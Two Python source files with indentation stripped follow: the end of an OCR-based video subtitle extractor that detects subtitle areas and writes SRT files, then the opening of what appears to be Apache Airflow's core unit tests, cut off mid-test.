cv2.rectangle(sample_frame, pt1=(0, ymin), pt2=(sample_frame.shape[1], ymax), color=(0, 0, 255), thickness=3)
sample_frame_file_path = os.path.join(os.path.dirname(self.frame_output_dir), 'subtitle_area.jpg')
cv2.imwrite(sample_frame_file_path, sample_frame)
print(f"{interface_config['Main']['CheckSubArea']} {sample_frame_file_path}")
user_input = input(f"{(ymin, ymax)} {interface_config['Main']['DeleteNoSubArea']}").strip()
if user_input == 'y' or user_input == '\n':
with open(self.raw_subtitle_path, mode='r+', encoding='utf-8') as f:
content = f.readlines()
f.seek(0)
for i in content:
i_ymin = int(i.split('\t')[1].split('(')[1].split(')')[0].split(', ')[2])
i_ymax = int(i.split('\t')[1].split('(')[1].split(')')[0].split(', ')[3])
if ymin <= i_ymin and i_ymax <= ymax:
f.write(i)
f.truncate()
print(interface_config['Main']['FinishDeleteNoSubArea'])
# 删除缓存
if os.path.exists(sample_frame_file_path):
os.remove(sample_frame_file_path)
def generate_subtitle_file(self):
"""
生成srt格式的字幕文件
"""
subtitle_content = self._remove_duplicate_subtitle()
srt_filename = os.path.join(os.path.splitext(self.video_path)[0] + '.srt')
# 保存持续时间不足1秒的字幕行,用于后续处理
post_process_subtitle = []
with open(srt_filename, mode='w', encoding='utf-8') as f:
for index, content in enumerate(subtitle_content):
line_code = index + 1
frame_start = self._frame_to_timecode(int(content[0]))
# 比较起始帧号与结束帧号, 如果字幕持续时间不足1秒,则将显示时间设为1s
if abs(int(content[1]) - int(content[0])) < self.fps:
frame_end = self._frame_to_timecode(int(int(content[0]) + self.fps))
post_process_subtitle.append(line_code)
else:
frame_end = self._frame_to_timecode(int(content[1]))
frame_content = content[2]
subtitle_line = f'{line_code}\n{frame_start} --> {frame_end}\n{frame_content}\n'
f.write(subtitle_line)
print(f"{interface_config['Main']['SubLocation']} {srt_filename}")
# 返回持续时间低于1s的字幕行
return post_process_subtitle
def generate_subtitle_file_vsf(self):
try:
subtitle_timestamp = []
with open(self.vsf_subtitle, mode='r', encoding='utf-8') as f:
lines = f.readlines()
timestamp = []
frame_no = []
for line in lines:
if re.match(r'^\d{1,}$', line):
frame_no.append(line.replace('\n', '').replace('\r', '').zfill(8))
if re.match(r'^\d{2,}:\d{2,}:\d{2,},\d{1,3}.*', line):
timestamp.append(line.replace('\n', '').replace('\r', ''))
for i in zip(frame_no, timestamp):
subtitle_timestamp.append(i)
subtitle_content = self._remove_duplicate_subtitle()
final_subtitle = []
for sc in subtitle_content:
frame_no = sc[0]
content = sc[2]
for st in subtitle_timestamp:
if st[0] == frame_no:
timestamp = st[1]
final_subtitle.append((timestamp, content))
srt_filename = os.path.join(os.path.splitext(self.video_path)[0] + '.srt')
with open(srt_filename, mode='w', encoding='utf-8') as f:
for i, subtitle_line in enumerate(final_subtitle):
f.write(f'{i + 1}\n')
f.write(f'{subtitle_line[0]}\n')
f.write(f'{subtitle_line[1]}\n')
print(f"{interface_config['Main']['SubLocation']} {srt_filename}")
except FileNotFoundError:
self.generate_subtitle_file()
def _analyse_subtitle_frame(self):
"""
使用简单的图像算法找出包含字幕的视频帧
: 参考 https://github.com/BruceHan98/OCR-Extract-Subtitles/blob/main/analyze_key_frame.py
"""
if self.sub_area is None:
return None
else:
subtitle_frame_index_list = []
index = 0
s_ymin = self.sub_area[0]
s_ymax = self.sub_area[1]
s_xmin = self.sub_area[2]
s_xmax = self.sub_area[3]
cap = cv2.VideoCapture(self.video_path)
success, frame = cap.read()
if success:
# 截取字幕部分
frame = frame[s_ymin:s_ymax, s_xmin:s_xmax]
h, w = frame.shape[0:2]
if config.BG_MOD == config.BackgroundColor.DARK: # 深色背景
minuend = np.full(h * w, config.BG_VALUE_DARK) # 被减矩阵
else:
minuend = np.full(h * w, config.BG_VALUE_OTHER) # 被减矩阵
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
flatten_gray = gray.flatten()
last_roi = flatten_gray - minuend
last_roi = np.where(last_roi > 0, 1, 0)
while cap.isOpened():
ret, frame = cap.read()
if not ret:
break
frame = frame[s_ymin:s_ymax, s_xmin:s_xmax]
if index % config.EXTRACT_INTERVAL == 0:
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
flatten_gray = gray.flatten()
roi = flatten_gray - minuend
roi = np.where(roi > 0, 1, 0)
change = roi - last_roi
addi = np.where(change > 0, 1, 0).sum()
if addi > roi.sum() * config.ROI_RATE: # 字幕增加
subtitle_frame_index_list.append(index)
last_roi = roi
index += 1
cap.release()
return subtitle_frame_index_list
def _detect_watermark_area(self):
"""
根据识别出来的raw txt文件中的坐标点信息,查找水印区域
假定:水印区域(台标)的坐标在水平和垂直方向都是固定的,也就是具有(xmin, xmax, ymin, ymax)相对固定
根据坐标点信息,进行统计,将一直具有固定坐标的文本区域选出
:return 返回最有可能的水印区域
"""
f = open(self.raw_subtitle_path, mode='r', encoding='utf-8') # 打开txt文件,以‘utf-8’编码读取
line = f.readline() # 以行的形式进行读取文件
# 坐标点列表
coordinates_list = []
# 帧列表
frame_no_list = []
# 内容列表
content_list = []
while line:
frame_no = line.split('\t')[0]
text_position = line.split('\t')[1].split('(')[1].split(')')[0].split(', ')
content = line.split('\t')[2]
frame_no_list.append(frame_no)
coordinates_list.append((int(text_position[0]),
int(text_position[1]),
int(text_position[2]),
int(text_position[3])))
content_list.append(content)
line = f.readline()
f.close()
# 将坐标列表的相似值统一
coordinates_list = self._unite_coordinates(coordinates_list)
# 将原txt文件的坐标更新为归一后的坐标
with open(self.raw_subtitle_path, mode='w', encoding='utf-8') as f:
for frame_no, coordinate, content in zip(frame_no_list, coordinates_list, content_list):
f.write(f'{frame_no}\t{coordinate}\t{content}')
if len(Counter(coordinates_list).most_common()) > config.WATERMARK_AREA_NUM:
# 读取配置文件,返回可能为水印区域的坐标列表
return Counter(coordinates_list).most_common(config.WATERMARK_AREA_NUM)
else:
# 不够则有几个返回几个
return Counter(coordinates_list).most_common()
def _detect_subtitle_area(self):
"""
读取过滤水印区域后的raw txt文件,根据坐标信息,查找字幕区域
假定:字幕区域在y轴上有一个相对固定的坐标范围,相对于场景文本,这个范围出现频率更高
:return 返回字幕的区域位置
"""
# 打开去水印区域处理过的raw txt
f = open(self.raw_subtitle_path, mode='r', encoding='utf-8') # 打开txt文件,以‘utf-8’编码读取
line = f.readline() # 以行的形式进行读取文件
# y坐标点列表
y_coordinates_list = []
while line:
text_position = line.split('\t')[1].split('(')[1].split(')')[0].split(', ')
y_coordinates_list.append((int(text_position[2]), int(text_position[3])))
line = f.readline()
f.close()
return Counter(y_coordinates_list).most_common(1)
def _frame_preprocess(self, frame):
"""
将视频帧进行裁剪
"""
# 对于分辨率大于1920*1080的视频,将其视频帧进行等比缩放至1280*720进行识别
# paddlepaddle会将图像压缩为640*640
# if self.frame_width > 1280:
# scale_rate = round(float(1280 / self.frame_width), 2)
# frames = cv2.resize(frames, None, fx=scale_rate, fy=scale_rate, interpolation=cv2.INTER_AREA)
cropped = int(frame.shape[0] // 2)
# 如果字幕出现的区域在下部分
if self.subtitle_area == config.SubtitleArea.LOWER_PART:
# 将视频帧切割为下半部分
frame = frame[cropped:]
# 如果字幕出现的区域在上半部分
elif self.subtitle_area == config.SubtitleArea.UPPER_PART:
# 将视频帧切割为下半部分
frame = frame[:cropped]
return frame
def _frame_to_timecode(self, frame_no):
"""
将视频帧转换成时间
:param frame_no: 视频的帧号,i.e. 第几帧视频帧
:returns: SMPTE格式时间戳 as string, 如'01:02:12:32' 或者 '01:02:12;32'
"""
# 设置当前帧号
cap = cv2.VideoCapture(self.video_path)
cap.set(cv2.CAP_PROP_POS_FRAMES, frame_no)
cap.read()
# 获取当前帧号对应的时间戳
milliseconds = cap.get(cv2.CAP_PROP_POS_MSEC)
seconds = milliseconds // 1000
milliseconds = int(milliseconds % 1000)
minutes = 0
hours = 0
if seconds >= 60:
minutes = int(seconds // 60)
seconds = int(seconds % 60)
if minutes >= 60:
hours = int(minutes // 60)
minutes = int(minutes % 60)
smpte_token = ','
cap.release()
return "%02d:%02d:%02d%s%02d" % (hours, minutes, seconds, smpte_token, milliseconds)
def _remove_duplicate_subtitle(self):
"""
读取原始的raw txt,去除重复行,返回去除了重复后的字幕列表
"""
self._concat_content_with_same_frameno()
with open(self.raw_subtitle_path, mode='r', encoding='utf-8') as r:
lines = r.readlines()
content_list = []
for line in lines:
frame_no = line.split('\t')[0]
content = line.split('\t')[2]
content_list.append((frame_no, content))
# 循环遍历每行字幕,记录开始时间与结束时间
index = 0
# 去重后的字幕列表
unique_subtitle_list = []
for i in content_list:
# TODO: 时间复杂度非常高,有待优化
# 定义字幕开始帧帧号
start_frame = i[0]
for j in content_list[index:]:
# 计算当前行与下一行的Levenshtein距离
distance = ratio(i[1], j[1])
if distance < config.THRESHOLD_TEXT_SIMILARITY or j == content_list[-1]:
# 定义字幕结束帧帧号
end_frame = content_list[content_list.index(j) - 1][0]
if end_frame == start_frame:
end_frame = j[0]
# 如果是第一行字幕,直接添加进列表
if len(unique_subtitle_list) < 1:
unique_subtitle_list.append((start_frame, end_frame, i[1]))
else:
string_a = unique_subtitle_list[-1][2].replace(' ', '')
string_b = i[1].replace(' ', '')
similarity_ratio = ratio(string_a, string_b)
# 打印相似度
# print(f'{similarity_ratio}: {unique_subtitle_list[-1][2]} vs {i[1]}')
# 如果相似度小于阈值,说明该两行字幕不一样
if similarity_ratio < config.THRESHOLD_TEXT_SIMILARITY:
unique_subtitle_list.append((start_frame, end_frame, i[1]))
else:
# 如果大于阈值,但又不完全相同,说明两行字幕相似
# 可能出现以下情况: "但如何进人并接管上海" vs "但如何进入并接管上海"
# OCR识别出现了错误识别
if similarity_ratio < 1:
# TODO:
# 1) 取出两行字幕的并集
# 2) 纠错
# print(f'{round(similarity_ratio, 2)}, 需要手动纠错:\n {string_a} vs\n {string_b}')
# 保存较长的
if len(string_a) < len(string_b):
unique_subtitle_list[-1] = (start_frame, end_frame, i[1])
index += 1
break
else:
continue
return unique_subtitle_list
def _concat_content_with_same_frameno(self):
"""
将raw txt文本中具有相同帧号的字幕行合并
"""
with open(self.raw_subtitle_path, mode='r', encoding='utf-8') as r:
lines = r.readlines()
content_list = []
frame_no_list = []
for line in lines:
frame_no = line.split('\t')[0]
frame_no_list.append(frame_no)
coordinate = line.split('\t')[1]
content = line.split('\t')[2]
content_list.append([frame_no, coordinate, content])
# 找出那些不止一行的帧号
frame_no_list = [i[0] for i in Counter(frame_no_list).most_common() if i[1] > 1]
# 找出这些帧号出现的位置
concatenation_list = []
for frame_no in frame_no_list:
position = [i for i, x in enumerate(content_list) if x[0] == frame_no]
concatenation_list.append((frame_no, position))
for i in concatenation_list:
content = []
for j in i[1]:
content.append(content_list[j][2])
content = ' '.join(content).replace('\n', ' ') + '\n'
for k in i[1]:
content_list[k][2] = content
# 将多余的字幕行删除
to_delete = []
for i in concatenation_list:
for j in i[1][1:]:
to_delete.append(content_list[j])
for i in to_delete:
if i in content_list:
content_list.remove(i)
with open(self.raw_subtitle_path, mode='w', encoding='utf-8') as f:
for frame_no, coordinate, content in content_list:
content = unicodedata.normalize('NFKC', content)
f.write(f'{frame_no}\t{coordinate}\t{content}')
def _unite_coordinates(self, coordinates_list):
"""
给定一个坐标列表,将这个列表中相似的坐标统一为一个值
e.g. 由于检测框检测的结果不是一致的,相同位置文字的坐标可能一次检测为(255,123,456,789),另一次检测为(253,122,456,799)
因此要对相似的坐标进行值的统一
:param coordinates_list 包含坐标点的列表
:return: 返回一个统一值后的坐标列表
"""
# 将相似的坐标统一为一个
index = 0
for coordinate in coordinates_list: # TODO:时间复杂度n^2,待优化
for i in coordinates_list:
if self.__is_coordinate_similar(coordinate, i):
coordinates_list[index] = i
index += 1
return coordinates_list
def _compute_image_similarity(self, image1, image2):
"""
计算两张图片的余弦相似度
"""
image1 = self.__get_thum(image1)
image2 = self.__get_thum(image2)
images = [image1, image2]
vectors = []
norms = []
for image in images:
vector = []
for pixel_tuple in image.getdata():
vector.append(average(pixel_tuple))
vectors.append(vector)
# linalg=linear(线性)+algebra(代数),norm则表示范数
# 求图片的范数
norms.append(linalg.norm(vector, 2))
a, b = vectors
a_norm, b_norm = norms
# dot返回的是点积,对二维数组(矩阵)进行计算
res = dot(a / a_norm, b / b_norm)
return res
def __get_area_text(self, ocr_result):
"""
获取字幕区域内的文本内容
"""
box, text = ocr_result
coordinates = self.__get_coordinates(box)
area_text = []
for content, coordinate in zip(text, coordinates):
if self.sub_area is not None:
s_ymin = self.sub_area[0]
s_ymax = self.sub_area[1]
s_xmin = self.sub_area[2]
s_xmax = self.sub_area[3]
xmin = coordinate[0]
xmax = coordinate[1]
ymin = coordinate[2]
ymax = coordinate[3]
if s_xmin <= xmin and xmax <= s_xmax and s_ymin <= ymin and ymax <= s_ymax:
area_text.append(content[0])
return area_text
def _compare_ocr_result(self, img1, img2):
"""
比较两张图片预测出的字幕区域文本是否相同
"""
area_text1 = "".join(self.__get_area_text(self.ocr.predict(img1)))
area_text2 = "".join(self.__get_area_text(self.ocr.predict(img2)))
if ratio(area_text1, area_text2) > config.THRESHOLD_TEXT_SIMILARITY:
return True
else:
return False
@staticmethod
def __get_coordinates(dt_box):
"""
从返回的检测框中获取坐标
:param dt_box 检测框返回结果
:return list 坐标点列表
"""
coordinate_list = list()
if isinstance(dt_box, list):
for i in dt_box:
i = list(i)
(x1, y1) = int(i[0][0]), int(i[0][1])
(x2, y2) = int(i[1][0]), int(i[1][1])
(x3, y3) = int(i[2][0]), int(i[2][1])
(x4, y4) = int(i[3][0]), int(i[3][1])
xmin = max(x1, x4)
xmax = min(x2, x3)
ymin = max(y1, y2)
ymax = min(y3, y4)
coordinate_list.append((xmin, xmax, ymin, ymax))
return coordinate_list
@staticmethod
def __is_coordinate_similar(coordinate1, coordinate2):
"""
计算两个坐标是否相似,如果两个坐标点的xmin,xmax,ymin,ymax的差值都在像素点容忍度内
则认为这两个坐标点相似
"""
return abs(coordinate1[0] - coordinate2[0]) < config.PIXEL_TOLERANCE_X and \
abs(coordinate1[1] - coordinate2[1]) < config.PIXEL_TOLERANCE_X and \
abs(coordinate1[2] - coordinate2[2]) < config.PIXEL_TOLERANCE_Y and \
abs(coordinate1[3] - coordinate2[3]) < config.PIXEL_TOLERANCE_Y
@staticmethod
def __get_thum(image, size=(64, 64), greyscale=False):
"""
对图片进行统一化处理
"""
# 利用image对图像大小重新设置, Image.ANTIALIAS为高质量的
image = image.resize(size, Image.ANTIALIAS)
if greyscale:
# 将图片转换为L模式,其为灰度图,其每个像素用8个bit表示
image = image.convert('L')
return image
def __delete_frame_cache(self):
if len(os.listdir(self.frame_output_dir)) > 0:
for i in os.listdir(self.frame_output_dir):
os.remove(os.path.join(self.frame_output_dir, i))
if __name__ == '__main__':
# 提示用户输入视频路径
video_path = input(f"{interface_config['Main']['InputVideo']}").strip()
# 提示用户输入字幕区域
ymin, ymax, xmin, xmax = map(int, input(f"{interface_config['Main']['ChooseSubArea']} (ymin ymax xmin xmax):").split())
subtitle_area = (ymin, ymax, xmin, xmax)
# 新建字幕提取对象
se = SubtitleExtractor(video_path, subtitle_area)
# 开始提取字幕
se.run()
|
core.py
|
# -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import bleach
import doctest
import json
import logging
import os
import re
import unittest
import multiprocessing
import mock
from numpy.testing import assert_array_almost_equal
import tempfile
from datetime import time, timedelta
from email.mime.multipart import MIMEMultipart
from email.mime.application import MIMEApplication
from freezegun import freeze_time
import signal
from six.moves.urllib.parse import urlencode
from time import sleep
import warnings
from dateutil.relativedelta import relativedelta
import sqlalchemy
from airflow import configuration
from airflow.executors import SequentialExecutor
from airflow.models import Variable
configuration.load_test_config()
from airflow import jobs, models, DAG, utils, macros, settings, exceptions
from airflow.models import BaseOperator
from airflow.operators.bash_operator import BashOperator
from airflow.operators.check_operator import CheckOperator, ValueCheckOperator
from airflow.operators.dagrun_operator import TriggerDagRunOperator
from airflow.operators.python_operator import PythonOperator
from airflow.operators.dummy_operator import DummyOperator
from airflow.operators.http_operator import SimpleHttpOperator
from airflow.operators import sensors
from airflow.hooks.base_hook import BaseHook
from airflow.hooks.sqlite_hook import SqliteHook
from airflow.bin import cli
from airflow.www import app as application
from airflow.settings import Session
from airflow.utils import timezone
from airflow.utils.timezone import datetime
from airflow.utils.state import State
from airflow.utils.dates import infer_time_unit, round_time, scale_time_units
from lxml import html
from airflow.exceptions import AirflowException
from airflow.configuration import AirflowConfigException, run_command
from jinja2.sandbox import SecurityError
from jinja2 import UndefinedError
import six
NUM_EXAMPLE_DAGS = 18
DEV_NULL = '/dev/null'
TEST_DAG_FOLDER = os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'dags')
DEFAULT_DATE = datetime(2015, 1, 1)
DEFAULT_DATE_ISO = DEFAULT_DATE.isoformat()
DEFAULT_DATE_DS = DEFAULT_DATE_ISO[:10]
TEST_DAG_ID = 'unit_tests'
try:
import cPickle as pickle
except ImportError:
# Python 3
import pickle
def reset(dag_id=TEST_DAG_ID):
session = Session()
tis = session.query(models.TaskInstance).filter_by(dag_id=dag_id)
tis.delete()
session.commit()
session.close()
reset()
class OperatorSubclass(BaseOperator):
"""
An operator to test template substitution
"""
template_fields = ['some_templated_field']
def __init__(self, some_templated_field, *args, **kwargs):
super(OperatorSubclass, self).__init__(*args, **kwargs)
self.some_templated_field = some_templated_field
def execute(*args, **kwargs):
pass
class CoreTest(unittest.TestCase):
# These defaults make the test faster to run
default_scheduler_args = {"file_process_interval": 0,
"processor_poll_interval": 0.5,
"num_runs": 1}
def setUp(self):
configuration.load_test_config()
self.dagbag = models.DagBag(
dag_folder=DEV_NULL, include_examples=True)
self.args = {'owner': 'airflow', 'start_date': DEFAULT_DATE}
dag = DAG(TEST_DAG_ID, default_args=self.args)
self.dag = dag
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
self.run_after_loop = self.dag_bash.get_task('run_after_loop')
self.run_this_last = self.dag_bash.get_task('run_this_last')
def test_schedule_dag_no_previous_runs(self):
"""
Tests scheduling a dag with no previous runs
"""
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_no_previous_runs')
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(datetime(2015, 1, 2, 0, 0), dag_run.execution_date, msg=
'dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date))
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
dag.clear()
def test_schedule_dag_fake_scheduled_previous(self):
"""
Test scheduling a dag where there is a prior DagRun
which has the same run_id as the next run should have
"""
delta = timedelta(hours=1)
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_fake_scheduled_previous',
schedule_interval=delta,
start_date=DEFAULT_DATE)
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=DEFAULT_DATE))
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
dag.create_dagrun(run_id=models.DagRun.id_for_date(DEFAULT_DATE),
execution_date=DEFAULT_DATE,
state=State.SUCCESS,
external_trigger=True)
dag_run = scheduler.create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(DEFAULT_DATE + delta, dag_run.execution_date, msg=
'dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date))
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
def test_schedule_dag_once(self):
"""
Tests scheduling a dag scheduled for @once - should be scheduled the first time
it is called, and not scheduled the second.
"""
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_once')
dag.schedule_interval = '@once'
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
dag_run2 = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertIsNone(dag_run2)
dag.clear()
def test_fractional_seconds(self):
"""
Tests if fractional seconds are stored in the database
"""
dag = DAG(TEST_DAG_ID + 'test_fractional_seconds')
dag.schedule_interval = '@once'
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
start_date = timezone.utcnow()
run = dag.create_dagrun(
run_id='test_' + start_date.isoformat(),
execution_date=start_date,
start_date=start_date,
state=State.RUNNING,
external_trigger=False
)
run.refresh_from_db()
self.assertEqual(start_date, run.execution_date,
"dag run execution_date loses precision")
self.assertEqual(start_date, run.start_date,
"dag run start_date loses precision ")
def test_schedule_dag_start_end_dates(self):
"""
Tests that an attempt to schedule a task after the Dag's end_date
does not succeed.
"""
delta = timedelta(hours=1)
runs = 3
start_date = DEFAULT_DATE
end_date = start_date + (runs - 1) * delta
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_start_end_dates',
start_date=start_date,
end_date=end_date,
schedule_interval=delta)
dag.add_task(models.BaseOperator(task_id='faketastic',
owner='Also fake'))
# Create and schedule the dag runs
dag_runs = []
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
for i in range(runs):
dag_runs.append(scheduler.create_dag_run(dag))
additional_dag_run = scheduler.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
@freeze_time('2016-01-01')
def test_schedule_dag_no_end_date_up_to_today_only(self):
"""
Tests that a Dag created without an end_date can only be scheduled up
to and including the current datetime.
For example, if today is 2016-01-01 and we are scheduling from a
start_date of 2015-01-01, only jobs up to, but not including
2016-01-01 should be scheduled.
"""
session = settings.Session()
delta = timedelta(days=1)
start_date = DEFAULT_DATE
runs = 365
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_no_end_date_up_to_today_only',
start_date=start_date,
schedule_interval=delta)
dag.add_task(models.BaseOperator(task_id='faketastic',
owner='Also fake'))
dag_runs = []
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
for i in range(runs):
dag_run = scheduler.create_dag_run(dag)
dag_runs.append(dag_run)
# Mark the DagRun as complete
dag_run.state = State.SUCCESS
session.merge(dag_run)
session.commit()
# Attempt to schedule an additional dag run (for 2016-01-01)
additional_dag_run = scheduler.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
def test_confirm_unittest_mod(self):
self.assertTrue(configuration.get('core', 'unit_test_mode'))
def test_pickling(self):
dp = self.dag.pickle()
self.assertEqual(dp.pickle.dag_id, self.dag.dag_id)
def test_rich_comparison_ops(self):
class DAGsubclass(DAG):
pass
dag_eq = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_load_time = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_name = DAG(TEST_DAG_ID + '_neq', default_args=self.args)
dag_subclass = DAGsubclass(TEST_DAG_ID, default_args=self.args)
dag_subclass_diff_name = DAGsubclass(
TEST_DAG_ID + '2', default_args=self.args)
for d in [dag_eq, dag_diff_name, dag_subclass, dag_subclass_diff_name]:
d.last_loaded = self.dag.last_loaded
# test identity equality
self.assertEqual(self.dag, self.dag)
# test dag (in)equality based on _comps
self.assertEqual(dag_eq, self.dag)
self.assertNotEqual(dag_diff_name, self.dag)
self.assertNotEqual(dag_diff_load_time, self.dag)
# test dag inequality based on type even if _comps happen to match
self.assertNotEqual(dag_subclass, self.dag)
# a dag should equal an unpickled version of itself
d = pickle.dumps(self.dag)
self.assertEqual(pickle.loads(d), self.dag)
# dags are ordered based on dag_id no matter what the type is
self.assertLess(self.dag, dag_diff_name)
self.assertGreater(self.dag, dag_diff_load_time)
self.assertLess(self.dag, dag_subclass_diff_name)
# greater than should have been created automatically by functools
self.assertGreater(dag_diff_name, self.dag)
# hashes are non-random and match equality
self.assertEqual(hash(self.dag), hash(self.dag))
self.assertEqual(hash(dag_eq), hash(self.dag))
self.assertNotEqual(hash(dag_diff_name), hash(self.dag))
self.assertNotEqual(hash(dag_subclass), hash(self.dag))
def test_time_sensor(self):
t = sensors.TimeSensor(
task_id='time_sensor_check',
target_time=time(0),
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_check_operators(self):
conn_id = "sqlite_default"
captainHook = BaseHook.get_hook(conn_id=conn_id)
captainHook.run("CREATE TABLE operator_test_table (a, b)")
captainHook.run("insert into operator_test_table values (1,2)")
t = CheckOperator(
task_id='check',
sql="select count(*) from operator_test_table",
conn_id=conn_id,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
t = ValueCheckOperator(
task_id='value_check',
pass_value=95,
tolerance=0.1,
conn_id=conn_id,
sql="SELECT 100",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
captainHook.run("drop table operator_test_table")
def test_clear_api(self):
task = self.dag_bash.tasks[0]
task.clear(
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE,
upstream=True, downstream=True)
ti = models.TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.are_dependents_done()
def test_illegal_args(self):
"""
Tests that Operators reject illegal arguments
"""
with warnings.catch_warnings(record=True) as w:
t = BashOperator(
task_id='test_illegal_args',
bash_command='echo success',
dag=self.dag,
illegal_argument_1234='hello?')
self.assertTrue(
issubclass(w[0].category, PendingDeprecationWarning))
self.assertIn(
'Invalid arguments were passed to BashOperator.',
w[0].message.args[0])
def test_bash_operator(self):
t = BashOperator(
task_id='time_sensor_check',
bash_command="echo success",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_multi_byte_output(self):
t = BashOperator(
task_id='test_multi_byte_bash_operator',
bash_command=u"echo \u2600",
dag=self.dag,
output_encoding='utf-8')
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_kill(self):
import subprocess
import psutil
sleep_time = "100%d" % os.getpid()
t = BashOperator(
task_id='test_bash_operator_kill',
execution_timeout=timedelta(seconds=1),
bash_command="/bin/bash -c 'sleep %s'" % sleep_time,
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
sleep(2)
pid = -1
for proc in psutil.process_iter():
if proc.cmdline() == ['sleep', sleep_time]:
pid = proc.pid
if pid != -1:
os.kill(pid, signal.SIGTERM)
self.fail("BashOperator's subprocess still running after stopping on timeout!")
def test_trigger_dagrun(self):
def trigga(context, obj):
if True:
return obj
t = TriggerDagRunOperator(
task_id='test_trigger_dagrun',
trigger_dag_id='example_bash_operator',
python_callable=trigga,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_dryrun(self):
t = BashOperator(
task_id='time_sensor_check',
bash_command="echo success",
dag=self.dag)
t.dry_run()
def test_sqlite(self):
import airflow.operators.sqlite_operator
t = airflow.operators.sqlite_operator.SqliteOperator(
task_id='time_sqlite',
sql="CREATE TABLE IF NOT EXISTS unitest (dummy VARCHAR(20))",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_timedelta_sensor(self):
t = sensors.TimeDeltaSensor(
task_id='timedelta_sensor_check',
delta=timedelta(seconds=2),
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_external_task_sensor(self):
t = sensors.ExternalTaskSensor(
task_id='test_external_task_sensor_check',
external_dag_id=TEST_DAG_ID,
external_task_id='time_sensor_check',
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_external_task_sensor_delta(self):
t = sensors.ExternalTaskSensor(
task_id='test_external_task_sensor_check_delta',
external_dag_id=TEST_DAG_ID,
external_task_id='time_sensor_check',
execution_delta=timedelta(0),
allowed_states=['success'],
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_external_task_sensor_fn(self):
self.test_time_sensor()
# check that the execution_fn works
t = sensors.ExternalTaskSensor(
task_id='test_external_task_sensor_check_delta',
external_dag_id=TEST_DAG_ID,
external_task_id='time_sensor_check',
execution_date_fn=lambda dt: dt + timedelta(0),
allowed_states=['success'],
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
# double check that the execution is being called by failing the test
t2 = sensors.ExternalTaskSensor(
task_id='test_external_task_sensor_check_delta',
external_dag_id=TEST_DAG_ID,
external_task_id='time_sensor_check',
execution_date_fn=lambda dt: dt + timedelta(days=1),
allowed_states=['success'],
timeout=1,
poke_interval=1,
dag=self.dag)
with self.assertRaises(exceptions.AirflowSensorTimeout):
